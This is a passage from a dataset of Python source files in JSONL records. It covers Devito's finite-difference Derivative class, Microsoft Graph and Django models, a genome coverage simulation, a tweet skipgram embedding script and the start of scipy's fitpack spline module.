been copied to aws dcf buckets\")\n else:\n print(\"The manifest validation fails\")\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30e56323ca7c988e51a1356d3ea28a9c3f27a9", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass MicrosoftgraphcalendarGroup(Model):\n \"\"\"MicrosoftgraphcalendarGroup.\n\n :param id:\n :type id: str\n :param name:\n :type name: str\n :param class_id:\n :type class_id: str\n :param change_key:\n :type change_key: str\n :param calendars:\n :type calendars: list[~users.models.Microsoftgraphcalendar]\n \"\"\"\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'class_id': {'key': 'classId', 'type': 'str'},\n 'change_key': {'key': 'changeKey', 'type': 'str'},\n 'calendars': {'key': 'calendars', 'type': '[Microsoftgraphcalendar]'},\n }\n\n def __init__(self, id=None, name=None, class_id=None, change_key=None, calendars=None):\n super(MicrosoftgraphcalendarGroup, self).__init__()\n self.id = id\n self.name = name\n self.class_id = class_id\n self.change_key = change_key\n self.calendars = calendars\n"} {"ext": "py", "sha": "1a30e57001c8cc5aa33737bd6d5005b00ce4a8d5", "content": "from collections import OrderedDict\nfrom collections.abc import Iterable\n\nfrom cached_property import cached_property\nimport numpy as np\nimport sympy\n\nfrom 
devito.finite_differences.finite_difference import (generic_derivative,\n first_derivative,\n cross_derivative)\nfrom devito.finite_differences.differentiable import Differentiable\nfrom devito.finite_differences.tools import direct, transpose\nfrom devito.tools import as_mapper, as_tuple, filter_ordered, frozendict\nfrom devito.types.array import Array\nfrom devito.types.dimension import StencilDimension\nfrom devito.types.utils import DimensionTuple\n\n__all__ = ['Derivative', 'Weights']\n\n\nclass Derivative(sympy.Derivative, Differentiable):\n\n \"\"\"\n An unevaluated Derivative, which carries metadata (Dimensions,\n derivative order, etc) describing how the derivative will be expanded\n upon evaluation.\n\n Parameters\n ----------\n expr : expr-like\n Expression for which the Derivative is produced.\n dims : Dimension or tuple of Dimension\n Dimenions w.r.t. which to differentiate.\n fd_order : int or tuple of int, optional\n Coefficient discretization order. Note: this impacts the width of\n the resulting stencil. Defaults to 1.\n deriv_order: int or tuple of int, optional\n Derivative order. Defaults to 1.\n side : Side or tuple of Side, optional\n Side of the finite difference location, centered (at x), left (at x - 1)\n or right (at x +1). Defaults to ``centered``.\n transpose : Transpose, optional\n Forward (matvec=direct) or transpose (matvec=transpose) mode of the\n finite difference. Defaults to ``direct``.\n subs : dict, optional\n Substitutions to apply to the finite-difference expression after evaluation.\n x0 : dict, optional\n Origin (where the finite-difference is evaluated at) for the finite-difference\n scheme, e.g. {x: x, y: y + h_y/2}.\n\n Examples\n --------\n Creation\n\n >>> from devito import Function, Derivative, Grid\n >>> grid = Grid((10, 10))\n >>> x, y = grid.dimensions\n >>> u = Function(name=\"u\", grid=grid, space_order=2)\n >>> Derivative(u, x)\n Derivative(u(x, y), x)\n\n This can also be obtained via the differential shortcut\n\n >>> u.dx\n Derivative(u(x, y), x)\n\n You can also specify the order as a keyword argument\n\n >>> Derivative(u, x, deriv_order=2)\n Derivative(u(x, y), (x, 2))\n\n Or as a tuple\n\n >>> Derivative(u, (x, 2))\n Derivative(u(x, y), (x, 2))\n\n Once again, this can be obtained via shortcut notation\n\n >>> u.dx2\n Derivative(u(x, y), (x, 2))\n\n Derivative object are also callable to change default setup:\n\n >>> u.dx2(x0=x + x.spacing)\n Derivative(u(x, y), (x, 2))\n\n will create the second derivative at x=x + x.spacing. 
Accepted arguments for dynamic\n evaluation are `x0`, `fd_order` and `side`.\n \"\"\"\n\n _state = ('expr', 'dims', 'side', 'fd_order', 'transpose', '_ppsubs', 'x0')\n _fd_priority = 3\n\n def __new__(cls, expr, *dims, **kwargs):\n if type(expr) == sympy.Derivative:\n raise ValueError(\"Cannot nest sympy.Derivative with devito.Derivative\")\n if not isinstance(expr, Differentiable):\n raise ValueError(\"`expr` must be a Differentiable object\")\n\n new_dims, orders, fd_o, var_count = cls._process_kwargs(expr, *dims, **kwargs)\n\n # Construct the actual Derivative object\n obj = Differentiable.__new__(cls, expr, *var_count)\n obj._dims = tuple(OrderedDict.fromkeys(new_dims))\n\n skip = kwargs.get('preprocessed', False) or obj.ndims == 1\n\n obj._fd_order = fd_o if skip else DimensionTuple(*fd_o, getters=obj._dims)\n obj._deriv_order = orders if skip else DimensionTuple(*orders, getters=obj._dims)\n obj._side = kwargs.get(\"side\")\n obj._transpose = kwargs.get(\"transpose\", direct)\n obj._ppsubs = as_tuple(frozendict(i) for i in kwargs.get(\"subs\", []))\n obj._x0 = frozendict(kwargs.get('x0', {}))\n return obj\n\n @classmethod\n def _process_kwargs(cls, expr, *dims, **kwargs):\n \"\"\"\n Process arguments for the construction of a Derivative\n \"\"\"\n # Skip costly processing if constructiong from preprocessed\n if kwargs.get('preprocessed', False):\n fd_orders = kwargs.get('fd_order')\n deriv_orders = kwargs.get('deriv_order')\n if len(dims) == 1:\n dims = tuple([dims[0]]*deriv_orders)\n variable_count = [sympy.Tuple(s, dims.count(s))\n for s in filter_ordered(dims)]\n return dims, deriv_orders, fd_orders, variable_count\n # Check `dims`. It can be a single Dimension, an iterable of Dimensions, or even\n # an iterable of 2-tuple (Dimension, deriv_order)\n if len(dims) == 0:\n raise ValueError(\"Expected Dimension w.r.t. which to differentiate\")\n elif len(dims) == 1:\n if isinstance(dims[0], Iterable):\n # Iterable of Dimensions\n if len(dims[0]) != 2:\n raise ValueError(\"Expected `(dim, deriv_order)`, got %s\" % dims[0])\n orders = kwargs.get('deriv_order', dims[0][1])\n if dims[0][1] != orders:\n raise ValueError(\"Two different values of `deriv_order`\")\n new_dims = tuple([dims[0][0]]*dims[0][1])\n else:\n # Single Dimension\n orders = kwargs.get('deriv_order', 1)\n if isinstance(orders, Iterable):\n orders = orders[0]\n new_dims = tuple([dims[0]]*orders)\n else:\n # Iterable of 2-tuple, e.g. ((x, 2), (y, 3))\n new_dims = []\n orders = []\n d_ord = kwargs.get('deriv_order', tuple([1]*len(dims)))\n for d, o in zip(dims, d_ord):\n if isinstance(d, Iterable):\n new_dims.extend([d[0] for _ in range(d[1])])\n orders.append(d[1])\n else:\n new_dims.extend([d for _ in range(o)])\n orders.append(o)\n new_dims = as_tuple(new_dims)\n orders = as_tuple(orders)\n\n # Finite difference orders depending on input dimension (.dt or .dx)\n fd_orders = kwargs.get('fd_order', tuple([expr.time_order if\n getattr(d, 'is_Time', False) else\n expr.space_order for d in dims]))\n if len(dims) == 1 and isinstance(fd_orders, Iterable):\n fd_orders = fd_orders[0]\n\n # SymPy expects the list of variable w.r.t. 
which we differentiate to be a list\n # of 2-tuple `(s, count)` where s is the entity to diff wrt and count is the order\n # of the derivative\n variable_count = [sympy.Tuple(s, new_dims.count(s))\n for s in filter_ordered(new_dims)]\n return new_dims, orders, fd_orders, variable_count\n\n def __call__(self, x0=None, fd_order=None, side=None):\n if self.ndims == 1:\n _fd_order = fd_order or self._fd_order\n _side = side or self._side\n new_x0 = {self.dims[0]: x0} if x0 is not None else self.x0\n return self._new_from_self(fd_order=_fd_order, side=_side, x0=new_x0)\n\n if side is not None:\n raise TypeError(\"Side only supported for first order single\"\n \"Dimension derivative such as `.dxl` or .dx(side=left)\")\n # Cross derivative\n _x0 = dict(self._x0)\n _fd_order = dict(self.fd_order._getters)\n try:\n _fd_order.update(**(fd_order or {}))\n _fd_order = tuple(_fd_order.values())\n _fd_order = DimensionTuple(*_fd_order, getters=self.dims)\n _x0.update(x0)\n except AttributeError:\n raise TypeError(\"Multi-dimensional Derivative, input expected as a dict\")\n\n return self._new_from_self(fd_order=_fd_order, x0=_x0)\n\n def _new_from_self(self, **kwargs):\n expr = kwargs.pop('expr', self.expr)\n _kwargs = {'deriv_order': self.deriv_order, 'fd_order': self.fd_order,\n 'side': self.side, 'transpose': self.transpose, 'subs': self._ppsubs,\n 'x0': self.x0, 'preprocessed': True}\n _kwargs.update(**kwargs)\n return Derivative(expr, *self.dims, **_kwargs)\n\n @property\n def func(self):\n return lambda *a, **kw: self._new_from_self(expr=a[0], **kw)\n\n def subs(self, *args, **kwargs):\n \"\"\"\n Bypass sympy.Subs as Devito has its own lazy evaluation mechanism.\n \"\"\"\n try:\n rules = dict(*args)\n except TypeError:\n rules = dict((args,))\n kwargs.pop('simultaneous', None)\n return self.xreplace(rules, **kwargs)\n\n def _xreplace(self, subs):\n \"\"\"\n This is a helper method used internally by SymPy. We exploit it to postpone\n substitutions until evaluation.\n \"\"\"\n subs = self._ppsubs + (subs,) # Postponed substitutions\n return self._new_from_self(subs=subs), True\n\n @cached_property\n def _metadata(self):\n state = list(self._state)\n state.remove('expr')\n ret = [getattr(self, i) for i in state]\n ret.append(self.expr.staggered or (None,))\n return tuple(ret)\n\n @property\n def dims(self):\n return self._dims\n\n @property\n def ndims(self):\n return len(self._dims)\n\n @property\n def x0(self):\n return self._x0\n\n @property\n def fd_order(self):\n return self._fd_order\n\n @property\n def deriv_order(self):\n return self._deriv_order\n\n @property\n def side(self):\n return self._side\n\n @property\n def transpose(self):\n return self._transpose\n\n @property\n def is_TimeDependent(self):\n return self.expr.is_TimeDependent\n\n @property\n def T(self):\n \"\"\"Transpose of the Derivative.\n\n FD derivatives can be represented as matrices and have adjoint/transpose.\n This is really useful for more advanced FD definitions. For example\n the conventional Laplacian is `.dxl.T * .dxl`\n \"\"\"\n if self._transpose == direct:\n adjoint = transpose\n else:\n adjoint = direct\n\n return self._new_from_self(transpose=adjoint)\n\n def _eval_at(self, func):\n \"\"\"\n Evaluates the derivative at the location of `func`. 
It is necessary for staggered\n setup where one could have Eq(u(x + h_x/2), v(x).dx)) in which case v(x).dx\n has to be computed at x=x + h_x/2.\n \"\"\"\n # If an x0 already exists do not overwrite it\n x0 = self.x0 or dict(func.indices_ref._getters)\n if self.expr.is_Add:\n # If `expr` has both staggered and non-staggered terms such as\n # `(u(x + h_x/2) + v(x)).dx` then we exploit linearity of FD to split\n # it into `u(x + h_x/2).dx` and `v(x).dx`, since they require\n # different FD indices\n mapper = as_mapper(self.expr._args_diff, lambda i: i.staggered)\n args = [self.expr.func(*v) for v in mapper.values()]\n args.extend([a for a in self.expr.args if a not in self.expr._args_diff])\n args = [self._new_from_self(expr=a, x0=x0) for a in args]\n return self.expr.func(*args)\n elif self.expr.is_Mul:\n # For Mul, We treat the basic case `u(x + h_x/2) * v(x) which is what appear\n # in most equation with div(a * u) for example. The expression is re-centered\n # at the highest priority index (see _gather_for_diff) to compute the\n # derivative at x0.\n return self._new_from_self(x0=x0, expr=self.expr._gather_for_diff)\n else:\n # For every other cases, that has more functions or more complexe arithmetic,\n # there is not actual way to decide what to do so it’s as safe to use\n # the expression as is.\n return self._new_from_self(x0=x0)\n\n @property\n def evaluate(self):\n # Evaluate finite-difference.\n # NOTE: `evaluate` and `_eval_fd` split for potential future different\n # types of discretizations\n return self._eval_fd(self.expr)\n\n @property\n def _eval_deriv(self):\n return self._eval_fd(self.expr)\n\n def _eval_fd(self, expr):\n \"\"\"\n Evaluate the finite-difference approximation of the Derivative.\n Evaluation is carried out via the following three steps:\n\n - 1: Evaluate derivatives within the expression. For example given\n `f.dx * g`, `f.dx` will be evaluated first.\n - 2: Evaluate the finite difference for the (new) expression.\n This in turn is a two-step procedure, for Functions that may\n may need to be evaluated at a different point due to e.g. 
a\n shited derivative.\n - 3: Apply substitutions.\n \"\"\"\n # Step 1: Evaluate derivatives within expression\n try:\n expr = expr._eval_deriv\n except AttributeError:\n pass\n\n # Step 2: Evaluate FD of the new expression\n if self.side is not None and self.deriv_order == 1:\n res = first_derivative(expr, self.dims[0], self.fd_order,\n side=self.side, matvec=self.transpose,\n x0=self.x0)\n elif len(self.dims) > 1:\n res = cross_derivative(expr, self.dims, self.fd_order, self.deriv_order,\n matvec=self.transpose, x0=self.x0)\n else:\n res = generic_derivative(expr, *self.dims, self.fd_order, self.deriv_order,\n matvec=self.transpose, x0=self.x0)\n\n # Step 3: Apply substitutions\n for e in self._ppsubs:\n res = res.xreplace(e)\n\n return res\n\n\nclass Weights(Array):\n\n \"\"\"\n The weights (or coefficients) of a finite-difference expansion.\n \"\"\"\n\n def __init_finalize__(self, *args, **kwargs):\n dimensions = as_tuple(kwargs.get('dimensions'))\n weights = kwargs.get('initvalue')\n\n assert len(dimensions) == 1\n d = dimensions[0]\n assert isinstance(d, StencilDimension) and d.symbolic_size == len(weights)\n assert isinstance(weights, (list, tuple, np.ndarray))\n\n kwargs['scope'] = 'static'\n\n super().__init_finalize__(*args, **kwargs)\n\n @property\n def dimension(self):\n return self.dimensions[0]\n\n weights = Array.initvalue\n"} {"ext": "py", "sha": "1a30e5b4cc1ec8cf662272ff61dfa7f1fa47b9da", "content": "#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nuntitled.py\n\nCreated by Olivier Huin on 2010-02-20.\nCopyright (c) 2010 Flarebyte.com Limited. All rights reserved.\n\"\"\"\n\nimport sys\nimport os\n\nactivitykinds={\n('shortid', 'uuid', 'visiting', 'visiting', ['visiting']),\n('shortid', 'uuid', 'booking', 'booking', ['booking']),\n('shortid', 'uuid', 'learning', 'learning', ['learning']),\n('shortid', 'uuid', 'eating', 'eating', ['eating']),\n('shortid', 'uuid', 'drinking', 'drinking', ['drinking']),\n('shortid', 'uuid', 'volunteering', 'volunteering', ['volunteering']),\n('shortid', 'uuid', 'fundraising', 'fundraising', ['fundraising']),\n\n}\n"} {"ext": "py", "sha": "1a30e65961d5c26c1690ebb3f1d085d6c8241ea4", "content": "#!/usr/bin/env python3\n\n# Write a program that simulates random BAC coverage over a genome\n# Command line arguments include\n# \tGenome size (e.g. 1000)\n# \tX coverage (e.g. 
5)\n# Use assert() to check parameter bounds\n# Report min, max, and histogram of coverage\n# Note that your output may vary due to random function\n\nimport sys\nimport random\n\nassert(len(sys.argv) == 3)\nbins = int(sys.argv[1])\nx = float(sys.argv[2])\nassert(bins > 0)\nassert(x > 0)\n\nbacs = int(bins * x)\ngenome = [0] * bins\n#1st array\nfor i in range(bacs):\n r = random.randint(0, bins -1)\n genome[r] += 1 \ngenome.sort()\nmin = genome[0]\nmax = genome[-1]\n\n#2nd array\nhist = [0] * (max + 1)\nfor v in genome:\n hist[v] += 1\n\n#output\nprint(f'Size: {bins}')\nprint(f'X: {x}')\nprint(f'BACs: {bacs}')\nprint(f'Min: {genome[0]}')\nprint(f'Max: {genome[-1]}')\nprint(f'Counts:')\nfor i in range(len(hist)):\n print(i, hist[i])\n\n\"\"\"\nSize: 1000\nX: 5.0\nBACs: 5000\nMin: 0\nMax: 13\nCounts:\n0 5\n1 39\n2 88\n3 144\n4 175\n5 150\n6 151\n7 116\n8 59\n9 40\n10 20\n11 5\n12 6\n13 2\n\"\"\"\n"} {"ext": "py", "sha": "1a30e709ba83c0d2e9d1a7afd432a1c711a977bb", "content": "import logging\nfrom typing import Any, Dict, List, TypedDict\n\nfrom utility import Utility\n\nlog: logging.Logger = logging.getLogger(__name__)\n\n\nclass CamoIDs(TypedDict):\n \"\"\"Structure of loot/camo_ids.csv\"\"\"\n\n id: int\n ref: str\n rarity: int\n price: int\n salvage: int\n license: int\n premium: int # bool\n\n\nclass CamoTable(TypedDict):\n \"\"\"Structure of mp/camotable.csv\"\"\"\n\n index: int\n ref: str\n botValid: int # bool\n category: str\n unlockType: str\n unlockString: str\n hideInUI: int # bool\n name: str\n image: str\n availableOffline: int # bool\n platformExclusiveType: str\n\n\nclass Camos:\n \"\"\"Camo XAssets.\"\"\"\n\n def Compile(self: Any) -> None:\n \"\"\"Compile the Camo XAssets.\"\"\"\n\n camos: List[Dict[str, Any]] = []\n\n camos = Camos.IDs(self, camos)\n camos = Camos.Table(self, camos)\n\n Utility.WriteFile(self, f\"{self.eXAssets}/camos.json\", camos)\n\n log.info(f\"Compiled {len(camos):,} Camos\")\n\n def IDs(self: Any, camos: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n \"\"\"Compile the loot/camo_ids.csv XAsset.\"\"\"\n\n ids: List[Dict[str, Any]] = Utility.ReadCSV(\n self, f\"{self.iXAssets}/loot/camo_ids.csv\", CamoIDs\n )\n\n if ids is None:\n return camos\n\n for entry in ids:\n camos.append(\n {\n \"id\": entry.get(\"id\"),\n \"altId\": entry.get(\"ref\"),\n \"name\": None,\n \"category\": None,\n \"type\": self.ModernWarfare.GetLootType(entry.get(\"id\")),\n \"rarity\": self.ModernWarfare.GetLootRarity(entry.get(\"rarity\")),\n \"season\": self.ModernWarfare.GetLootSeason(entry.get(\"license\")),\n \"exclusive\": None,\n \"available\": self.ModernWarfare.GetTitleAvailability(\n entry.get(\"id\")\n ),\n \"hidden\": None,\n \"image\": None,\n }\n )\n\n return camos\n\n def Table(self: Any, camos: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n \"\"\"Compile the mp/camotable.csv XAsset.\"\"\"\n\n table: List[Dict[str, Any]] = Utility.ReadCSV(\n self, f\"{self.iXAssets}/mp/camotable.csv\", CamoTable\n )\n\n if table is None:\n return camos\n\n for camo in camos:\n for entry in table:\n if camo.get(\"altId\") != entry.get(\"ref\"):\n continue\n\n camo[\"name\"] = self.localize.get(entry.get(\"name\"))\n camo[\"category\"] = self.ModernWarfare.GetCamoCategory(\n entry.get(\"category\")\n )\n camo[\"exclusive\"] = self.ModernWarfare.GetPlatformExclusivity(\n entry.get(\"platformExclusiveType\")\n )\n camo[\"hidden\"] = bool(entry.get(\"hidden\"))\n camo[\"image\"] = entry.get(\"image\")\n\n return camos\n"} {"ext": "py", "sha": 
"1a30e7652169a437c848f9b1ca1c98927301347f", "content": "class Pagelet(object):\r\n\r\n def __init__(self, parent_request, target_element_id, route_view, params, method: str = 'GET', depends_on: str= None):\r\n self.parent_request = parent_request\r\n self.target = target_element_id\r\n self.route_view = route_view\r\n self.params = params\r\n self.method = method\r\n self.depends_on = depends_on\r\n\r\n def render(self):\r\n return self.route_view(self.parent_request, **self.params)\r\n"} {"ext": "py", "sha": "1a30e871a167b1e77ffaf8a14121b8009989b2a7", "content": "import numpy as np\nimport pandas as pd\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom tensorflow.keras.preprocessing.sequence import skipgrams\nfrom keras.utils import np_utils\nfrom keras.preprocessing.sequence import make_sampling_table\nimport scipy.io as sio\nimport os\n\n\ndef train(cleaned_tweets, tweets, hashtags, sentiment, source_idx, target_idx):\n # Obtain skipgram embedding only\n # Create feature representation: TFIDF-Variants and skipgram embedding with 1000 dimension and negative sampling\n # Output will be saved to disk\n # get_glove_embedding_matrix(cleaned_tweets)\n # get_skipgram_gensim_embedding_matrix(cleaned_tweets)\n\n # Sentence Skipgram is the base feature representation of the datatset\n X = get_skipgram_sentence_embedding_matrix(cleaned_tweets)\n\n # Create bytes file for the visualization\n X.dtype=np.float32\n X.tofile(\"data/skipgram_tensors.bytes\")\n\n create_domain_adaptation_dataset(X, tweets, source_idx, target_idx, sentiment)\n\n\ndef get_skipgram_sentence_embedding_matrix(text, dim=200, batch_size=256, window_size=5, epochs=1):\n print(\"get_skipgram_sentence_embedding_matrix\")\n if os.path.isfile(\"data/sentqs_skipgram_sentence_embedding.npz\"):\n loaded_embedding = np.load(\"data/sentqs_skipgram_sentence_embedding.npz\")\n loaded_embedding = loaded_embedding[\"embedding\"]\n print('Loaded Skipgram embedding.')\n return loaded_embedding\n else:\n text = [''.join(x) for x in text]\n t = Tokenizer()\n t.fit_on_texts(text)\n corpus = t.texts_to_sequences(text)\n # print(corpus)\n V = len(t.word_index)\n step_size = len(corpus) // batch_size\n model = Sequential()\n model.add(Dense(units=dim, input_dim=V, activation=\"softmax\"))\n model.add(Dense(units=V, input_dim=dim, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n model.summary()\n\n model.fit(generate_data(corpus, window_size, V), epochs=epochs, steps_per_epoch=step_size)\n # model.save(\"data/sentqs_full_skigram_arc.h5\")\n mlb = MultiLabelBinarizer()\n enc = mlb.fit_transform(corpus)\n emb = enc @ model.get_weights()[0]\n np.savez_compressed(\"data/sentqs_skipgram_sentence_embedding\", embedding=emb)\n return emb\n\n\ndef create_domain_adaptation_dataset(X, tweets, source_idx, target_idx, sentiment):\n Xs = X[source_idx]\n Xt = X[target_idx]\n Ys = sentiment[source_idx]\n Yt = sentiment[target_idx]\n data = [Xs, Ys, Xt, Yt]\n np.savez('data/sentqs_dataset.npz', *data)\n sio.savemat('data/sentqs_dataset.mat', {'Xs': Xs, 'Xt': Xt, 'Ys': Ys, 'Yt': Yt})\n source_tweets = [tweets[i] for i in source_idx]\n target_tweets = [tweets[i] for i in target_idx]\n\n pd.DataFrame(source_tweets).to_csv(\"data/sentqs_source_tweets.csv\")\n pd.DataFrame(target_tweets).to_csv(\"data/sentqs_target_tweets.csv\")\n return Xs, Ys, Xt, Yt\n\n\ndef 
generate_data(corpus, window_size, V):\n for words in corpus:\n couples, labels = skipgrams(words, V, window_size, negative_samples=1, shuffle=True,\n sampling_table=make_sampling_table(V, sampling_factor=1e-05))\n if couples:\n X, y = zip(*couples)\n X = np_utils.to_categorical(X, V)\n y = np_utils.to_categorical(y, V)\n yield X, y\n"} {"ext": "py", "sha": "1a30e8d20a58f8425ab9facc0fa55f1e3ed9bfef", "content": "from commndata.models import TimeLinedTable\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom enum import Enum\n\n\nclass SalaryTable(TimeLinedTable):\n class SALARY_TABLE(models.IntegerChoices):\n GS1 = (1010, '行(一)')\n GS2 = (1020, '行(二)')\n SGS = (1110, '専門行政')\n ZM = (1210, '税務')\n KA1 = (1310, '公安(一)')\n KA2 = (1320, '公安(二)')\n KJ1 = (1410, '海(一)')\n KJ2 = (1420, '海(二)')\n KI1 = (1510, '教(一)')\n KI2 = (1520, '教(二)')\n KK = (1610, '研究')\n IR1 = (1710, '医(一)')\n IR2 = (1720, '医(二)')\n IR3 = (1730, '医(三)')\n FS = (1810, '福祉')\n NK1 = (1910, '任研(一)') # 任期付き研究員\n NK2 = (1920, '任研(二)')\n TNK = (1930, '特任研') # 特定任期付き研究員\n SS = (2010, '専門スタッフ')\n ST = (2110, '指定職') # 指定職\n\n class STAFF_TYPE(models.IntegerChoices):\n TY = (1, '定員')\n SNY = (2, '再任用')\n\n salary_table = models.IntegerField(verbose_name=_('salary table'), blank=False,\n choices=SALARY_TABLE.choices, default=SALARY_TABLE.GS1) # 俸給表\n salary_level = models.IntegerField(verbose_name=_('salary level')) # 級\n salary_no = models.IntegerField(verbose_name=_('salary no')) # 号俸\n salary_monthly = models.IntegerField(verbose_name=_('salary monthly')) # 俸給月額\n salary_adjustment = models.IntegerField(verbose_name=_('salary adjustment')) # 俸給の調整額\n \n @property\n def sny_salary_no():\n \"\"\"\n 再任用職員の号俸\n \"\"\"\n return 999\n\n class Meta:\n permissions = [\n ('import_salary_table', 'Can import salary_table'),\n ('export_salary_table', 'Can export salary_table'),\n ]\n verbose_name = _('salary table')\n verbose_name_plural = _('salary table')\n constraints = [\n models.UniqueConstraint(name='salary_table_unique', fields = ['start_date', 'salary_table', 'salary_level', 'salary_adjustment']), \n ]\n ordering = ['-start_date', 'salary_table', 'salary_level', 'salary_no']\n \n def __str__(self):\n return self.salary_table\n\nclass SalaryTableExcel(TimeLinedTable):\n salary_table = models.IntegerField(verbose_name=_('salary table'), blank=False,\n choices=SalaryTable.SALARY_TABLE.choices, default=SalaryTable.SALARY_TABLE.GS1) # 俸給表\n sheet_name = models.CharField(max_length=10, verbose_name=_('シート名'))\n rows = models.IntegerField(verbose_name=_('級'), default=1)\n cols = models.IntegerField(verbose_name=_('号俸'), default=1)\n sny_flg = models.BooleanField(verbose_name=_('再任用有無'), default=True)\n start_cell = models.CharField(max_length=10, verbose_name=_('データ開始セル'))\n\n class Meta:\n db_table = 'salary_table_excel'\n verbose_name = _('俸給表取込エクセル設定')\n verbose_name_plural = _('俸給表取込エクセル設定')\n constraints = [\n models.UniqueConstraint(name='salary_table_excel_unique', fields = ['start_date', 'salary_table',]), \n ]\n ordering = ['-start_date', 'salary_table', ]\n"} {"ext": "py", "sha": "1a30e926fcd000f43102fb752e44a5336141a0cd", "content": "# from electrum_vtc.i18n import _\n# \n# fullname = _('Two Factor Authentication')\n# description = ''.join([\n# _(\"This plugin adds two-factor authentication to your wallet.\"), '<br/>',\n# _(\"For more information, visit\"),\n# \" <a href=\\\"https://api.trustedcoin.com/#/electrum-help\\\">https://api.trustedcoin.com/#/electrum-help</a>\"\n# ])\n# 
requires_wallet_type = ['2fa']\n# registers_wallet_type = '2fa'\n# available_for = ['qt', 'cmdline', 'kivy']\n"} {"ext": "py", "sha": "1a30ea2e7047e2719bac3d3d2a071f5de7e58fc5", "content": "\"\"\"\nfitpack --- curve and surface fitting with splines\n\nfitpack is based on a collection of Fortran routines DIERCKX\nby P. Dierckx (see http://www.netlib.org/dierckx/) transformed\nto double routines by Pearu Peterson.\n\"\"\"\n# Created by Pearu Peterson, June,August 2003\nfrom __future__ import division, print_function, absolute_import\n\n__all__ = [\n 'UnivariateSpline',\n 'InterpolatedUnivariateSpline',\n 'LSQUnivariateSpline',\n 'BivariateSpline',\n 'LSQBivariateSpline',\n 'SmoothBivariateSpline',\n 'LSQSphereBivariateSpline',\n 'SmoothSphereBivariateSpline',\n 'RectBivariateSpline',\n 'RectSphereBivariateSpline']\n\n\nimport warnings\n\nfrom numpy import zeros, concatenate, alltrue, ravel, all, diff, array, ones\nimport numpy as np\n\nfrom . import fitpack\nfrom . import dfitpack\n\n\n################ Univariate spline ####################\n\n_curfit_messages = {1:\"\"\"\nThe required storage space exceeds the available storage space, as\nspecified by the parameter nest: nest too small. If nest is already\nlarge (say nest > m/2), it may also indicate that s is too small.\nThe approximation returned is the weighted least-squares spline\naccording to the knots t[0],t[1],...,t[n-1]. (n=nest) the parameter fp\ngives the corresponding weighted sum of squared residuals (fp>s).\n\"\"\",\n 2:\"\"\"\nA theoretically impossible result was found during the iteration\nproces for finding a smoothing spline with fp = s: s too small.\nThere is an approximation returned but the corresponding weighted sum\nof squared residuals does not satisfy the condition abs(fp-s)/s < tol.\"\"\",\n 3:\"\"\"\nThe maximal number of iterations maxit (set to 20 by the program)\nallowed for finding a smoothing spline with fp=s has been reached: s\ntoo small.\nThere is an approximation returned but the corresponding weighted sum\nof squared residuals does not satisfy the condition abs(fp-s)/s < tol.\"\"\",\n 10:\"\"\"\nError on entry, no approximation returned. The following conditions\nmust hold:\nxb<=x[0]<x[1]<...<x[m-1]<=xe, w[i]>0, i=0..m-1\nif iopt=-1:\n xb<t[k+1]<t[k+2]<...<t[n-k-2]<xe\"\"\"\n }\n\n\n# UnivariateSpline, ext parameter can be an int or a string\n_extrap_modes = {0: 0, 'extrapolate': 0,\n 1: 1, 'zeros': 1,\n 2: 2, 'raise': 2,\n 3: 3, 'const': 3}\n\n\nclass UnivariateSpline(object):\n \"\"\"\n One-dimensional smoothing spline fit to a given set of data points.\n\n Fits a spline y = spl(x) of degree `k` to the provided `x`, `y` data. `s`\n specifies the number of knots by specifying a smoothing condition.\n\n Parameters\n ----------\n x : (N,) array_like\n 1-D array of independent input data. Must be increasing.\n y : (N,) array_like\n 1-D array of dependent input data, of the same length as `x`.\n w : (N,) array_like, optional\n Weights for spline fitting. Must be positive. If None (default),\n weights are all equal.\n bbox : (2,) array_like, optional\n 2-sequence specifying the boundary of the approximation interval. If\n None (default), ``bbox=[x[0], x[-1]]``.\n k : int, optional\n Degree of the smoothing spline. Must be <= 5.\n Default is k=3, a cubic spline.\n s : float or None, optional\n Positive smoothing factor used to choose the number of knots. 
Number\n of knots will be increased until the smoothing condition is satisfied::\n\n sum((w[i] * (y[i]-spl(x[i])))**2, axis=0) <= s\n\n If None (default), ``s = len(w)`` which should be a good value if\n ``1/w[i]`` is an estimate of the standard deviation of ``y[i]``.\n If 0, spline will interpolate through all data points.\n ext : int or str, optional\n Controls the extrapolation mode for elements\n not in the interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 of 'const', return the boundary value.\n\n The default value is 0.\n\n check_finite : bool, optional\n Whether to check that the input arrays contain only finite numbers.\n Disabling may give a performance gain, but may result in problems\n (crashes, non-termination or non-sensical results) if the inputs\n do contain infinities or NaNs.\n Default is False.\n\n See Also\n --------\n InterpolatedUnivariateSpline : Subclass with smoothing forced to 0\n LSQUnivariateSpline : Subclass in which knots are user-selected instead of\n being set by smoothing condition\n splrep : An older, non object-oriented wrapping of FITPACK\n splev, sproot, splint, spalde\n BivariateSpline : A similar class for two-dimensional spline interpolation\n\n Notes\n -----\n The number of data points must be larger than the spline degree `k`.\n\n **NaN handling**: If the input arrays contain ``nan`` values, the result\n is not useful, since the underlying spline fitting routines cannot deal\n with ``nan`` . A workaround is to use zero weights for not-a-number\n data points:\n\n >>> from scipy.interpolate import UnivariateSpline\n >>> x, y = np.array([1, 2, 3, 4]), np.array([1, np.nan, 3, 4])\n >>> w = np.isnan(y)\n >>> y[w] = 0.\n >>> spl = UnivariateSpline(x, y, w=~w)\n\n Notice the need to replace a ``nan`` by a numerical value (precise value\n does not matter as long as the corresponding weight is zero.)\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(-3, 3, 50)\n 